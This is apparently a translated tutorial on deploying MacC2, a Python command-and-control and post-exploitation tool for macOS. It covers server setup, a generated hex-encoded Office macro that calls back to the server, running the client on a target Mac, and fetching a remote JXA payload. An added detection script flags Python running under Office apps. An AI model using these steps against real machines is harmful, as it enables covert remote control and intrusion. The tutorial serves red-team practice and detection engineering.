2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
The editor shares how to use MacC2 for post-exploitation on macOS. I hope you will gain something from this article. Let's discuss it together.
MacC2
MacC2 is a Python-based macOS post-exploitation tool that uses Objective-C calls or Python libraries rather than command-line execution. The MacC2 client is written in Python 2; although Python 2 is deprecated, it still ships with the Big Sur installation. Apple is likely to remove Python 2 from the base macOS installation (or drop the bundled Python environment entirely), but as of November 2020 that has not happened.
The main purpose of the tool is to help security research teams run penetration-testing drills and build detection for Python-based post-exploitation frameworks on macOS. Apple plans to remove scripting runtimes from the base installation of macOS, and the timing is unknown, but the current Big Sur installation still includes Python.
The current version of MacC2 has been tested on Catalina and Big Sur. On Big Sur, the only command that does not work as expected is systeminfo.
You can set up the server locally, or use the Docker configuration provided in the project repository.
Run MacC2 using Docker
If you have not already installed Docker, install and configure it with the following commands:
chmod +x install_docker_linux.sh
sudo ./install_docker_linux.sh
Next, run the following command. It creates an untrusted (self-signed) SSL certificate and key, generates a macro file (macro.txt) for the chosen server and port, and builds the macc2-docker image. After the build completes, the MacC2 server runs in interactive mode inside macc2-docker.
At this point, the tool asks for the IP address or hostname of the MacC2 server:
Then enter the port number the MacC2 server should listen on:
The tool generates a hex-encoded payload and stores it in a local file named macro.txt; this payload connects back to your MacC2 server using the hostname/IP and port you entered:
Docker installs the aiohttp Python 3 dependency, builds macc2-docker, and runs the MacC2 server in the container. When complete, the MacC2 server listens on the port you specified:
Now we can verify that the MacC2 server is running with the following command:
docker ps
In addition, the installation script configures a shared mount between the container and the host. On the host, browse /var/lib/docker/volumes/macc2/_data to access MacC2_client.py and macro.txt.
We can then copy MacC2_client.py to the client, which calls back to the server when executed, or paste the macro.txt macro into an Office document; once macros are enabled, the document triggers the callback on the client side.
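Since the article states that one purpose of this tool is building detection for Python-based post-exploitation on macOS, here is an added defender-side example (not part of the original article or the MacC2 project) that flags the delivery chain just described: a Python interpreter running underneath an Office application. The JSON-lines telemetry format, its field names and the sample events are constructed assumptions; adapt them to your EDR or unified-log export.

```python
"""Flag Python interpreters descended from Office apps in macOS process telemetry.

Added example for this article, not MacC2 code. The JSON-lines event format
(pid, ppid, name, cmdline) is an assumption; map it to your own telemetry.
"""
import json
from typing import Dict, List, Optional

# Office applications that can run macros on macOS (assumed process names).
OFFICE_PARENTS = {"Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint"}
# Interpreter names a Python-based implant would need.
PYTHON_NAMES = {"python", "python2", "python2.7", "python3", "Python"}

# Constructed sample telemetry: a benign launchd-spawned python3, a python
# spawned directly by Word, and a python spawned via an intermediate shell.
SAMPLE_EVENTS = """\
{"pid": 600, "ppid": 1, "name": "Microsoft Word", "cmdline": "Microsoft Word"}
{"pid": 501, "ppid": 1, "name": "python3", "cmdline": "python3 build.py"}
{"pid": 612, "ppid": 600, "name": "python", "cmdline": "python /tmp/MacC2_client.py"}
{"pid": 613, "ppid": 600, "name": "sh", "cmdline": "sh -c python -c ..."}
{"pid": 614, "ppid": 613, "name": "python", "cmdline": "python -c ..."}
"""


def load_events(text: str) -> Dict[int, dict]:
    """Parse JSON-lines telemetry into a pid -> event map."""
    events: Dict[int, dict] = {}
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            events[ev["pid"]] = ev
    return events


def office_ancestor(events: Dict[int, dict], pid: int, max_depth: int = 8) -> Optional[str]:
    """Walk the ppid chain and return the first Office app found, or None."""
    ev = events.get(pid)
    for _ in range(max_depth):           # bounded walk guards against ppid cycles
        if ev is None:
            return None
        ev = events.get(ev["ppid"])
        if ev is not None and ev["name"] in OFFICE_PARENTS:
            return ev["name"]
    return None


def find_office_python_chains(text: str) -> List[dict]:
    """Return one alert per Python interpreter that has an Office app as an ancestor."""
    events = load_events(text)
    alerts = []
    for pid, ev in sorted(events.items()):
        if ev["name"] in PYTHON_NAMES:
            parent = office_ancestor(events, pid)
            if parent:
                alerts.append({"pid": pid, "office_parent": parent, "cmdline": ev["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in find_office_python_chains(SAMPLE_EVENTS):
        print(f"ALERT pid={a['pid']} under {a['office_parent']}: {a['cmdline']}")
```

The intermediate-shell case matters because a macro rarely launches the interpreter directly, so matching only direct parent/child pairs would miss it.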
Run locally (without using Docker)
If you don't want to use Docker, you can also build and configure the server locally.
First, clone the project source code with the following command:
git clone https://github.com/cedowens/MacC2.git
Since the MacC2 server uses the aiohttp library for network communication, install aiohttp first:
pip install aiohttp
python3 -m pip install --upgrade --force pip
Next, on the C2 server, configure SSL (the key size must be at least 2048 bits):
openssl req -new -newkey rsa:2048 -nodes -out ca.csr -keyout ca.key
openssl x509 -trustout -signkey ca.key -days 365 -req -in ca.csr -out ca.pem
Please note that the file names ca.pem and ca.key must not be changed; the server expects them as-is.
Then use macro_generator.py to create the MacC2 script, specifying the server's IP address or domain name and port number. macro_generator.py also builds a hex-encoded macro file (macro.txt) that runs MacC2; its contents can be copied into an MS Office document.
Usage: python3 macro_generator.py -s [C2 Server IP/domain] -p [C2 Server Port]
Use the MacC2_server.py script to listen for connections:
On the client side (the target macOS host), run the MacC2_client.py script with the following command:
python MacC2_client.py
At this point, the incoming connection appears on the server side:
MacC2 usage
After a connection is received, use the "help" command on the server side to list the built-in commands, then enter a command name to view its details:
You can also generate a Mythic C2 JXA .js payload and host it on a remote server, then pass the URL of the hosted file to the runjxa command so that MacC2 executes the Mythic JXA payload: